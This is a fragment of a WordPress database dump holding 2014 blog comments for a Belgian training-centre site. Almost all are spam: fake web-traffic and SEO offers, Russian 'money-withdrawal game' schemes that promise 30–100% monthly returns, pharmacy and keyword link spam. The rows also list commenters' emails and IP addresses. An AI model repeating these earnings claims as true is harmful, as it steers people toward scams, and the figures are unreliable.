(77, 1, 'Karen', 'uwloxwyly@gmail.com', 'http://go.pigmeu.net/6fX', '23.81.201.88', '2014-02-20 07:34:33', '2014-02-20 07:34:33', 'You need targeted traffic to your website so why not try some for free? There is a VERY POWERFUL and POPULAR company out there who now lets you try their website traffic service for 7 days free of charge. I am so glad they opened their traffic system back up to the public! Check it out here: http://go.pigmeu.net/6fX', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(78, 1, 'katyakeupetman', 'efimrodin@gmail.com', 'http://gamenet.kz', '37.115.188.48', '2014-02-20 17:20:50', '2014-02-20 17:20:50', '<a href=\"http://bianco.kz\" rel=\"nofollow\">Свадебные платья</a>', 0, '0', 'Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.10', '', 0, 0),
(79, 1, 'Mckayla', 'obgurlojo@gmail.com', 'http://crown.im/1581', '23.81.201.84', '2014-02-23 05:20:21', '2014-02-23 05:20:21', 'This is a message to the webmaster. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your website: http://iam.at/1a3 They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(80, 1, 'Surveys', 'linda-lency1986@htomail.com', 'http://money-with-surveys.com/start.html', '178.137.162.244', '2014-02-23 13:13:27', '2014-02-23 13:13:27', 'Hi www.crosstrainingcenter.be admin, \r\nIf you want to make $20-$50/hour and up to $3000/month working at \r\nhome part-time then this is the most important message  you’re ever going to read... \r\n \r\nIt may sound hard to believe, but it\'s true.  There are thousands of companies out there who are willing to pay for your opinions regarding their products.  This is an important part of product research, and they rely on people just like you for your honest opinion! \r\n \r\nImagine getting paid for doing simple things like: \r\n \r\n- Take short surveys about new cars that are coming out soon \r\n- Give your opinion about new clothing and shoe designs \r\n- Trying out new menu items from popular restaurants \r\nBut here\'s a problem, it\'s very hard to find out best survey site and you probably can waste too much time, \r\nbut I just stumbled up  website http://money-with-surveys.com/start.html \r\nwhere they sorted the best paying survey site DB allowing single dad making $3000/month \r\n \r\nClick Here To read this amazing  story : \r\nhttp://money-with-surveys.com/start.html \r\n \r\n \r\nYour friend \r\nLinda', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0),
(81, 1, 'Susan', 'sqlyfns@gmail.com', 'http://regisztralj.be/tj', '23.81.201.92', '2014-02-25 02:53:59', '2014-02-25 02:53:59', 'I came to your page and noticed you could have a lot more hits. I have found that the key to running a popular website is making sure the visitors you are getting are interested in your subject matter. There is a company that you can get traffic from and they let you try their service for free. I managed to get over 300 targeted visitors to day to my site. Visit them today: http://monurl.ca/85kk', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(82, 1, 'Swayna', 'leszckbqlhk@gmail.com', 'http://ow.ly/sXRuL', '23.81.201.74', '2014-03-01 20:23:16', '2014-03-01 20:23:16', 'This is a message to the admin. Your website is missing out on at least 300 visitors per day. I have found a company which offers to dramatically increase your traffic to your site: http://regisztralj.be/tj They offer 1,000 free visitors during their free trial period and I managed to get over 30,000 visitors per month using their services, you could also get lot more targeted visitors than you have now. Hope this helps :) Take care.', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0);
INSERT INTO `wp_comments` (`comment_ID`, `comment_post_ID`, `comment_author`, `comment_author_email`, `comment_author_url`, `comment_author_IP`, `comment_date`, `comment_date_gmt`, `comment_content`, `comment_karma`, `comment_approved`, `comment_agent`, `comment_type`, `comment_parent`, `user_id`) VALUES
(83, 1, 'GoldenBlon', 'lazarevatyu@yandex.com', 'http://golden-birds.biz/', '95.28.255.143', '2014-03-07 16:31:53', '2014-03-07 16:31:53', 'Golden Birds - интеллектуально-ролевый онлайн симулятор с выводом денег. Зарабатывай на своих яйцах каждые 10 минут! \r\nРегистрация: http://golden-birds.biz/ \r\n \r\n1. Купите птиц, они будут нести вам яйца. \r\n2. Яйца будут накапливаться на складе, собирайте их. \r\n3. Продавайте яйца и получайте за них серебро. \r\n4. Обменивайте серебро на реальные деньги, либо покупайте больше птиц, чтобы они приносили вам еще больше прибыли! \r\n \r\nПримущества игры: \r\n1. Резервный фонд \r\n2. Окупаемость \r\n3. Выгодные условия \r\n4. Стабильность \r\n5. Круглосуточная поддержка \r\n6. Прозрачность системы \r\n \r\nТекущие акции: \r\nДо 12.03.2014 бонус при любом пополнении +200% \r\n2 синих птицы, при пополнении свыше 500 руб. \r\n1 красная птица, при пополнении свыше 1500 руб. \r\n \r\nЕжедневный бонус: \r\nСумма бонуса генерируется случайно от 10 до 100 серебра. \r\n \r\nПартнерская программа: \r\nПриглашайте в игру своих друзей и знакомых, Вы будете получать 30% от каждого пополнения баланса приглашенным Вами \r\nчеловеком. Доход ни чем не ограничен. Даже несколько приглашенных могут принести вам более 100 000 серебра. \r\n \r\nКонкурсы рефералов: \r\nКонкурс рефералов № 8 с общим призовым фондом 45000 руб. \r\n \r\nСтарт конкурса: 10.02.2014 в 18:58:07 \r\nЗавершение:     11.03.2014 в 18:58:02 \r\n \r\nПризовые места: \r\n1 - 30000 RUB \r\n2 - 10000 RUB \r\n3 - 5000 RUB \r\n \r\nЦены на птиц и их окупаемость: \r\nПтица----------------Стоимость------------Доход---------Окупаемость \r\nЗелёная----------------1 руб----------0,01 руб\\день--------59 дней \r\nЖёлтая----------------10 руб----------0,16 руб\\день--------59 дней \r\nКоричневая------------50 руб----------0,88 руб\\день--------56 дней \r\nСиняя----------------250 руб----------4,60 руб\\день--------54 дней \r\nКрасная-------------1000 руб---------23,16 руб\\день--------43 дней \r\n \r\nСтатистика проекта: \r\nВсего участников:    100081 \r\nНовых за 24 часа:    2021 \r\nВыплачено всего:     5041902.34 руб. \r\nРезерв проекта:      10990404.23 руб. \r\nПроекту пошел:       143 - й день \r\n \r\nигры с возможностью вывода денег отзывы \r\nигра шахта с выводом денег отзывы \r\nтоп игр с выводом денег отзывы \r\nпроверенные игры с выводом денег отзывы \r\nфермандия игра с выводом денег отзывы', 0, '0', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.19 (KHTML, like Gecko) Chrome/25.0.1323.1 Safari/537.19', '', 0, 0),
(84, 1, 'PharaohsBlon', 'marysmirnofff@yandex.com', 'http://empire-pharaohs.com/', '128.72.120.170', '2014-03-10 01:21:28', '2014-03-10 01:21:28', 'Empire Of The Pharaohs - экономическия игра в реальном времени с выводом средств. \r\n \r\nДля тех кто играет в экономические игры и не только. Регистрация: http://empire-pharaohs.com/ \r\n \r\nВсем привет, рад представить Вам свежую экономическую игру с выводом средств \"Империя Фараонов\". \r\nПлюсы: отсутствие платежных баллов. Вывод средств ничем не ограничен. Авто-выплаты на PAYEER. \r\n \r\nИмперия Фараонов - экономическия игра в реальном времени с выводом средств. Окунитесь в атмосферу древнего Египта, создайте собственную Империю Фараонов, которая будет давать Вам реальные деньги. \r\n \r\nВ этой ролевой игре Вам предоставляется управлять Империей Фараонов. Преобретайте рабов, ремесленников, воинов, жрецов и фараонов. Каждый персонаж вырабатывает определенную продукцию, которую можно обменять и выручить за нее золото. Чем он дороже, тем больше продукции он вырабатывает. \r\n \r\nЗолото можно продать на денежные средства и вывести из игры на свой электронный счет. Можно покупать безконечное количество персонажей. Все персонажи и их продукция не портятся и никуда не исчезают. Сбор продукции осуществляется без потерь и ограничений по срокам. Автоматический ввод в игру и вывод денег на Ваш счет. Маленькая минималка. \r\n \r\nМожно играть без вкладов. При регистрации мы отдаем всем Раба в подарок. Ежедневные бонусы, лотерея, конкурсы. Так же присутствует реферальная программа. Приглашайте в игру своих близких и знакомых. За каждое пополнение баланса партнерами, Вы будете получать 20% от суммы их пополнения. Ваша Империя будет приносить прибыль вечно. \r\n \r\nСтатистика проекта: \r\nВсего жителей:	          3580 чел. \r\nНовых за сутки:	          92 чел. \r\nПродали золота на:	  6922.34 RUB \r\nКупили золота на:         73119.44 RUB \r\nВозраст империи:	  37-й день \r\n \r\nЦены и расчет дохода: \r\nПерсонаж------------Стоимость---------Прибыль------Окупаемость \r\nРаб------------------30 руб--------0,24 руб.день------125 дней \r\nРемесленник----------150 руб-------1,44 руб.день------104 дней \r\nВоин-----------------300 руб-------3,60 руб.день-------83 дней \r\nЖрец-----------------600 руб-------8,64 руб.день-------69 дней \r\nФараон--------------1200 руб-------19,44 руб.день------61 дней \r\n \r\nНе однократно уже получены выплаты. Всех кого заинтересовало мое письмо, могут зарегистрироваться на проекте \r\nи посмотреть все своими глазами, а при желании, начать играть. Всем приятной игры и хорошего настроения. \r\n \r\nинтернет игры с выводом денег отзывы \r\nлучшая игра с выводом денег отзывы \r\nигра бобер с выводом денег отзывы \r\nигра бобры с выводом денег отзывы \r\ngarden игра с выводом денег отзывы', 0, '0', 'Opera/9.80 (Windows NT 5.1; Edition Ukraine Local) Presto/2.12.388 Version/12.10', '', 0, 0),
(85, 1, 'seo vps', '*@gmail.com', 'http://www.webtrafficsoftware.info', '87.238.209.234', '2014-03-11 10:50:37', '2014-03-11 10:50:37', 'Want to rank your website? http://www.webtrafficsoftware.info', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(86, 1, 'Pauline', 'tgrcshvdxl@gmail.com', 'http://tiny6.com/ldia', '23.81.201.92', '2014-03-12 03:01:30', '2014-03-12 03:01:30', 'We have decided to open our POWERFUL and PRIVATE website traffic system to the public for a limited time! You can sign up for our UP SCALE network with a free trial as we get started with the public\'s orders. Imagine how your bank account will look when your website gets the traffic it deserves. Visit us today: http://pay4by.cc/rnwh', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.0.3705)', '', 0, 0),
(87, 1, 'ZogNam', '343ewcf3pdes@gmail.com', 'http://xxioeoieejjwbb1w.com', '91.200.14.96', '2014-03-13 08:52:09', '2014-03-13 08:52:09', '?I used to be more than happy to search out this internet-site.I needed to thanks on your time for this wonderful learn!! I definitely having fun with every little little bit of it and I\'ve you bookmarked to check out new stuff you weblog post.', 0, '0', 'Opera/9.80 (Windows NT 6.1; Edition Yx) Presto/2.12.388 Version/12.11', '', 0, 0),
(88, 1, 'extreme traffic', 'linda-fericsen@hotmail.com', 'http://extreme-seo-traffic.com', '178.137.92.70', '2014-03-19 09:01:51', '2014-03-19 09:01:51', 'hi www.crosstrainingcenter.be owner discovered your site via search engine but it was hard to find and I see you could have more visitors because there are not so many comments yet. I have discovered website which offer dramatically increase laser targeted traffic from search engines to your site http://extreme-seo-traffic.com they claim they managed to get close to 4000 visitors/day using their services you could also get lot more targeted traffic from search engines as you have now. I used their services and got significantly more visitors to my website. Hope this helps :) They offer most cost effective services to increase website traffic at this website http://extreme-seo-traffic.com \r\nTo your success your friend \r\nLinda', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36 OPR/20.0.1387.64', '', 0, 0),
(89, 1, 'extreme traffic', 'sophia.allen89@hotmail.com', 'http://massive-auto-traffic.com', '46.118.116.0', '2014-04-01 09:17:58', '2014-04-01 09:17:58', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://massive-auto-traffic.com \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://massive-auto-traffic.com \r\nBest regards \r\nYour friend \r\nSophia', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0', '', 0, 0),
(90, 1, 'Jennifer', 'lwazhmsr@gmail.com', 'http://abrevia.retialis.net/158g', '23.81.201.89', '2014-04-03 05:51:35', '2014-04-03 05:51:35', 'Are you tired of your site not giving you the traffic you hoped it would like I once was? If so I am spreading the word about my recent experience with an SEO service that has taken my website to the next level! Their SEO package is a must-have for websites of any age and the best part is that their work is Penguin and Panda proof. I wasn\'t sure at first but since they offer a seven day free trial I signed up. Now my site is on the first page of Google and getting a lot of search engine traffic! Visit them today: http://url.sorgol.com/3s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(91, 1, 'Jennifer', 'awqextezxwe@gmail.com', 'http://bsand.in/-gi5i', '23.81.201.74', '2014-04-04 20:40:56', '2014-04-04 20:40:56', 'In the competitive market of Google results owning and maintaining a website can be difficult and time consuming. As webmasters we all could use more visitors and increased Google rankings, but we must also be wary of the penguin and panda updates that Google has recently introduced. Luckily I have found an SEO service that is penquin and panda proof, that is will not incur penalties based on the new algorithm updates. They also offer a seven day free trial to try the product out and I saw a dramatic increase in my traffic once I signed up. In fact I am so happy with their service I am spreading the word to all of the webistes I visit frequently. Check them out here: http://bsand.in/-gi5i', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) )', '', 0, 0),
(92, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://kpdstroy.ru/bolars-kley-plitochnyy/', '94.127.144.225', '2014-04-06 11:16:57', '2014-04-06 11:16:57', '<a href=\"http://kpdstroy.ru/bolars-kley-plitochnyy/\" / rel=\"nofollow\"> \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg</a> \r\n \r\nTegs: штукатурка боларс короед  боларс клей плиточный метро бульвар дмитрия донского  <b>боларс финишная super</b>. \r\n \r\nболарс двери входные  боларс клей плиточный район свиблово  \r\n<i>боларс стяжка основа бт  боларс клей плиточный район северный </i> \r\n<b>боларс structure 0 5  боларс клей плиточный юзао </b> \r\n<a href=\"http://kpdstroy.ru/bolars-kley-plitochnyy/\" / rel=\"nofollow\">боларс клей плиточный район ново-переделкино </a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.13014 YaBrowser/13.12.1599.13014 Safari/537.36', '', 0, 0),
(93, 1, 'FishSn', 'galaluda@yandex.com', 'http://fish-empire.net/', '95.25.1.39', '2014-04-06 17:33:07', '2014-04-06 17:33:07', 'FISH-EMPIRE.NET - игра рпг с выводом денег. Запуск игры 31.03.2014. \r\n \r\nДля ознакомления кликните по ссылке: http://fish-empire.net/ \r\n \r\nНаши Особенности: Свободная статистика - Вы всегда будете знать о текущем состоянии золота в игре. В системе не содержится никаких запретов для обмена золота. \r\n \r\nВыгодные условия - возможность во много раз приумножить свои вклады. Мы обещаем от 30% до 100% ежемесячно. \r\n \r\nРост капитала проекта - за счет влива средств на рекламу и привлечения в игру новых участников - пользователями, работающих по партнерской програме. Быстрая поддержка на приветном форуме. Уникальная среда и ещё разнообразие других плюсов. \r\n \r\nО проекте: FISH-EMPIRE.NET - игра рпг с выводом денег. Погрузитесь в среду экономической онлайн игры и создайте свою Рыбную Империю, которая всегда будет приносить Вам настоящие деньги. \r\n \r\nВ данной игре Вам нужно приобретать всяких рыб. Каждая рыба дает икру, которую можно продать на золото. Золото можно выручить за настоящие средства и снять из проекта на свои электронные счета. \r\n \r\nВсе рыбы производят определенное количество икры, чем они больше стоят, тем икры производят больше. Вы можете преобретать любое их количество, у рыб нет срока годности, они никуда не исчезнут и будут давать Вам икру стабильно. Сбор икры осуществляется без потерь и препятствий по времени. \r\n \r\nНачинай Игру: Начать играть можно без затрат. При регистрации мы дарим Всем Щуку. Каждый день бонусы, лотерея, конкурсы, акции. Так же существует партнерская програма. Призывайте в игру своих друзей и близких. \r\n \r\nЗа каждое пополнение баланса партнерами, Вы будете иметь 30% от суммы их инвестиций. Авто -  ввод в игру и вывод средств на Ваш электронный счет. Низкая минималка на Payeer, всего 3 RUB. Ваша Рыбная Империя будет давать средства каждый день. \r\n \r\nКурс игрового инвентаря: 100 гр. икры = 1 гр. золота. 100 гр. золота = 1 RUB. \r\n \r\nРыбы-------------------Стоимость----------------Доход в день-----------Окупаемость \r\nЩука--------------------90 RUB--------------------1 RUB--------------------90 дней \r\nМинтай-----------------270 RUB------------------3,6 RUB--------------------75 дней \r\nЛосось-----------------810 RUB------------------13,5 RUB-------------------60 дней \r\nОсетр------------------2430 RUB-----------------54 RUB---------------------45 дней \r\nБелуга-----------------7290 RUB-----------------243 RUB--------------------30 дней', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36', '', 0, 0),
(94, 1, 'Abby', 'cindcisamt@gmail.com', 'http://jasonchua.me/qcnaz', '23.81.201.82', '2014-04-06 23:09:20', '2014-04-06 23:09:20', 'Are you tired of your site not giving you the results you hoped it would like I once was? If so I am spreading the word about my recent experience with an SEO company that has taken my business to the next level! Their SEO service is a must-have for websites of any age and the best part is that their work is Penguin and Panda proof. I was skeptical at first but since they offer a seven day free trial I tried it. Now my site is on the first page of Google and getting tons of search engine traffic! Visit them today: http://url.sorgol.com/3s', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', '', 0, 0),
(95, 1, 'Abby', 'nepvtq@gmail.com', 'http://s-url.me/c30', '23.81.201.90', '2014-04-09 08:50:36', '2014-04-09 08:50:36', 'Hello web admin, I finally found your website after going through many different pages of search results on Google. I am sure you do not get a lot of organic search traffic as you are not on the the first page of search results. I found a company that can fix your search traffic problem and get your website to the first page:http://url.sorgol.com/3s As you know, organic search traffic is the most valuable and targeted traffic on the internet and I am getting close to 1,000 visitors per day using their service and that is why I am recommending them to you. I wish you success in the future with your website!', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727 ; .NET CLR 4.0.30319)', '', 0, 0),
(96, 1, 'john', 'john@hotmail.com', 'http://www.QS3PE5ZGdxC9IoVKTAPT2DBYpPkMKqfz.com', '62.210.142.7', '2014-04-09 23:49:11', '2014-04-09 23:49:11', 'TvRAfb http://www.QS3PE5ZGdxC9IoVKTAPT2DBYpPkMKqfz.com', 0, '0', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)', '', 0, 0),
(97, 1, 'FishLoda', 'innsolowiewa@yandex.com', 'http://fish-empire.net/', '128.72.3.229', '2014-04-17 12:24:21', '2014-04-17 12:24:21', 'РЫБНАЯ ИМПЕРИЯ - online игра с выводом денег. Старт системы 31.03.2014. \r\n \r\nДля регистрации перейдите по ссылке: http://fish-empire.net/ \r\n \r\nНаши Привелегии: Открытая статистика - Вы всегда будете осведомлены о реальном состоянии золота в игре. В системе нет никаких санкций для продажи золота. \r\n \r\nВыгодное сотрудничество - доступность во много раз приумножить свои инвестиции. Мы обещаем от 30% до 100% ежемесячно. \r\n \r\nУвеличение резерва игры - за счет выделения денег на рекламу и приглашения в игру новых игроков - участниками, участвующих по партнерской програме. Оперативная поддержка на приветном форуме. Уникальная среда и ещё множество других особенностей. \r\n \r\nОб Игре: РЫБНАЯ ИМПЕРИЯ - online игра с выводом денег. Войдите в среду экономической онлайн игры и возведите свою Рыбную Империю, которая каждый день будет приносить Вам реальные деньги. \r\n \r\nВ данной игре Вам предстоит приобретать разных рыб. Любая рыба производит икру, которую можно выручить на золото. Золото можно выручить за реальные деньги и вывести из проекта на свои электронные кошельки. \r\n \r\nЛюбые рыбы дают условное кол-во икры, чем они больше стоят, тем икры дают больше. Вы можете преобретать любое их кол-во, у рыб нет срока годности, они никуда не исчезнут и будут метать Вам икру всегда. Сбор икры происходит без потерь и ограничений по срокам. \r\n \r\nНачинай Играть: Начать играть можно без затрат. При регистрации мы дарим Всем Щуку. Каждый день бонусы, лотерея, конкурсы, акции. Так же существует реферальная програма. Приводите в систему своих знакомых и родных. \r\n \r\nЗа каждое пополнение баланса партнерами, Вы будете иметь 30% от суммы их пополнения. Авто -  ввод в систему и вывод денег на Ваш электронный кошелек. Мизерная минималка на Паеер, всего 3 RUB. Ваша Рыбная Империя будет давать прибыль всегда. \r\n \r\nКурс игрового инвентаря: 100 гр. икры = 1 гр. золота. 100 гр. золота = 1 RUB. \r\n \r\nРыбы-------------------Стоимость----------------Доход в день-----------Окупаемость \r\nЩука--------------------90 RUB--------------------1 RUB--------------------90 дней \r\nМинтай-----------------270 RUB------------------3,6 RUB--------------------75 дней \r\nЛосось-----------------810 RUB------------------13,5 RUB-------------------60 дней \r\nОсетр------------------2430 RUB-----------------54 RUB---------------------45 дней \r\nБелуга-----------------7290 RUB-----------------243 RUB--------------------30 дней', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.16', '', 0, 0),
(98, 1, 'Richardzek', 'e.gamanowa2014@yandex.ru', '', '128.68.153.35', '2014-04-21 03:43:23', '2014-04-21 03:43:23', 'Make $600 Per Day Working Online \r\nit\'s just \r\nhttp://trustmid.ru/', 0, '0', 'Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0', '', 0, 0),
(99, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://tm-stroi.ru/dekorativnaya-shtukaturka.html', '183.207.228.12', '2014-04-26 04:31:34', '2014-04-26 04:31:34', 'http://tm-stroi.ru/dekorativnaya-shtukaturka.html  -  \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg \r\n \r\nTegs: декоративная штукатурка валпаинт  декоративная штукатурка метро дубровка  декоративная штукатурка барнаул. \r\n \r\nдекоративная штукатурка velluto  декоративная штукатурка район медведково северный  \r\nдекоративная штукатурка шпателем  декоративная штукатурка район бибирево  \r\nдекоративная штукатурка короед фото  декоративная штукатурка район крылатский  \r\nhttp://tm-stroi.ru/dekorativnaya-shtukaturka.html  - декоративная штукатурка метро митино', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36', '', 0, 0),
(100, 1, 'Moiffitagoaro', 'tmsnewtmsnew@gmail.com', 'http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html', '94.127.144.225', '2014-05-16 10:26:26', '2014-05-16 10:26:26', '<a href=\"http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html\" rel=\"nofollow\"> \r\nhttp://s017.radikal.ru/i416/1310/55/4cdd574b932d.jpg \r\nhttp://s017.radikal.ru/i443/1310/be/5d33f485a4b8.jpg</a> \r\n \r\nTegs: боларс декор ёлки  декоративная штукатурка боларс район северный  <b>боларс декор зу</b>. \r\n \r\nболарс декор яndex  декоративная штукатурка боларс район дегунино западный  \r\n<i>боларс декор маша и медведь 2013  декоративная штукатурка боларс метро сокол </i> \r\n<b>боларс декор ёй  декоративная штукатурка боларс метро студенческая </b> \r\n<a href=\"http://tm-stroi.ru/dekorativnaya-shtukaturka-bolars.html\" rel=\"nofollow\">декоративная штукатурка боларс метро тургеневский </a>', 0, '0', 'Opera/9.80 (Windows NT 6.1; Win64; x64) Presto/2.12.388 Version/12.16', '', 0, 0),
(101, 1, 'viktoraleksandrovich', 'viktoraleksandrovich7@gmail.com', 'http://antiagingclinic.ru', '178.137.95.66', '2014-05-31 17:30:01', '2014-05-31 17:30:01', 'http://antiagingclinic.ru - Древо Жизни', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; rv:27.0) Gecko/20100101 Firefox/27.0', '', 0, 0),
(102, 1, 'EllaBix', 'ms.ella.jackson99667@hotmail.com', 'http://get-huge-autopilot-traffic.com', '178.137.163.60', '2014-06-04 23:08:20', '2014-06-04 23:08:20', 'After getting more than 10000 visitors/day to my website I thought your www.crosstrainingcenter.be website also need  unstoppable flow of traffic... \r\n \r\nUse this BRAND NEW software and get all the traffic for your website you will ever need ... \r\n \r\n= = &gt; &gt; http://get-huge-autopilot-traffic.com \r\n \r\n \r\nIn testing phase it generated 867,981 visitors and $540,340. \r\n \r\nThen another $86,299.13 in 90 days to be exact. That\'s $958.88 a \r\nday!! \r\n \r\nAnd all it took was 10 minutes to set up and run. \r\n \r\nBut how does it work?? \r\n \r\nYou just configure the system, click the mouse button a few \r\ntimes, activate the software, copy and paste a few links and \r\nyou\'re done!! \r\n \r\nClick the link BELOW as you\'re about to witness a software that \r\ncould be a MAJOR turning point to your success. \r\n \r\n= = &gt; &gt; http://get-huge-autopilot-traffic.com \r\n \r\nBest regards \r\nYour friend \r\nElla', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.102 Safari/537.36 OPR/19.0.1326.59', '', 0, 0),
(103, 1, 'ThomasEl', 'igorp.petroff2014@yandex.ru', 'http://financeandlittlehobby.blog.com/', '77.66.186.213', '2014-06-10 10:06:30', '2014-06-10 10:06:30', 'Distinguish Spanking New Spring/Summer Picks on Discount By Nordstrom Promo Code 2014 Lulus Coupon Codes Offer - How Spring Folds in to Summer?  \r\nhttp://loans-for.com/check-out-coupondevta-before-you-even-visit-any.html - Check Out CouponDevta Before You Even Visit any Shopping Site  \r\n-&gt;       Would you what\'s disadvantage of internet? How\'s it through or happens out of the blue without providing you with any hint? It\'s defiantly this type of hindrance that effects all very q...\r\n-&gt;       Are you currently fashion obsessed? Like to liven up and flaunt around your hot favorite star does? Would you deem over being a style icon yourself? Well for those who have these kinds...\r\n \r\nhttp://financeandlittlehobby.blog.com/  \r\nSheltering Personal Information at Ease with Life Lock Coupons Lulus Coupon Codes Offer - How Spring Folds in to Summer?  \r\nhttp://loans-for.com/how-to-use-coupon-codes-to-save-money-on-online.html - How to Use Coupon Codes to Save Money on Online Shopping?  \r\n-&gt;       Cat\'s eyes and blond curls may be the fashion leader componen excellence. The lady requests parties with crazy and natural looks. The design and style leaves you special. Well for a myr...\r\n-&gt;       Are you currently jaded from the &quot;same&quot; outfit or accessory transported every second time? You\'re also bored of these two different prices from the brand to street that baffle...\r\n \r\nhttp://financeandlittlehobby.blog.com/', 0, '0', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36', '', 0, 0),
(104, 1, 'MichaelWat', 'projabnabest1971@yandex.com', 'http://www.purchase-online-easy.com/skyrim-where-buy-land-falkreath.html', '94.127.144.225', '2014-06-19 01:35:19', '2014-06-19 01:35:19', 'Buy bongs online cheap \r\n<a href=\"http://www.purchase-online-easy.com/buy-fioricet-online-cheap-overnight-shipping.html\" rel=\"nofollow\">Buy fioricet online cheap overnight shipping</a> \r\nhttp://www.purchase-online-easy.com/muscat-buy-and-sell-phones.html \r\nOne of the most popular reasons why company meetings have been known to have gone astray is because people tend wander off topic. They squander away precious time digressing rather than discussing, which dissolves the entire point of the meeting. Here are a few ways in which company meetings can be bettered so that they meet the standards that are required of them. \r\nAwesome stuff to buy online \r\n<a href=\"http://www.purchase-online-easy.com/cheap-bicycle-sale-singapore.html\" rel=\"nofollow\">Cheap bicycle sale singapore</a> \r\nhttp://www.purchase-online-easy.com/looking-buy-house.html \r\nHi, this is Ashish here and would like to share with you about Diamond Powder and Diamond Paste where you can know more about Diamond Dressers . Read the full... \r\nSkateboard truck buying guide \r\n<a href=\"http://www.purchase-online-easy.com/bid-buy-sold-auctions-sydney.html\" rel=\"nofollow\">Bid buy sold auctions sydney</a> \r\nhttp://www.purchase-online-easy.com/online-group-buying-sites-manila.html \r\nNicole Bruce is associated with Hoxton Industries, one of the best packaging companies of Sydney, offering reliable document shredding, destruction and warehouse and storage services in Sydney . Read the full...', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.117 Safari/537.36', '', 0, 0),
(105, 1, 'Donaldsi', 'donaldPync@gmail.com', 'http://www.trahnu.ru/', '95.79.119.9', '2014-06-24 10:58:09', '2014-06-24 10:58:09', 'What matchless topic', 0, '0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.146 Safari/537.36', '', 0, 0),
